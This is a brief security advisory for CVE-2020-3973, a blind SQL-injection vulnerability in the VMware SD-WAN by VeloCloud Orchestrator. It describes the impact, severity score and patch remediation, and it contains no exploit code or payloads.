VMware has released a security update to address a vulnerability in VeloCloud. An attacker could exploit this vulnerability to obtain sensitive information.
Impacted Products
VMware SD-WAN by VeloCloud (VeloCloud)
Advisory Details
The VeloCloud Orchestrator does not apply correct input validation which allows for blind SQL-injection. VMware has evaluated the severity of this issue to be in the important severity range with a maximum CVSSv3 base score of 8.5.
Known Attack Vendors
A malicious actor with tenant access to Velocloud Orchestrator could enter specially crafted SQL queries and obtain data to which they are not privileged.
Resolution
To remediate CVE-2020-3973 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found on the link for the Security Advisory provided below.
This advisory is available at: https://my.vmware.com/web/vmware/downloads/info/slug/networking_security/vmware_sd_wan/3_4_1.
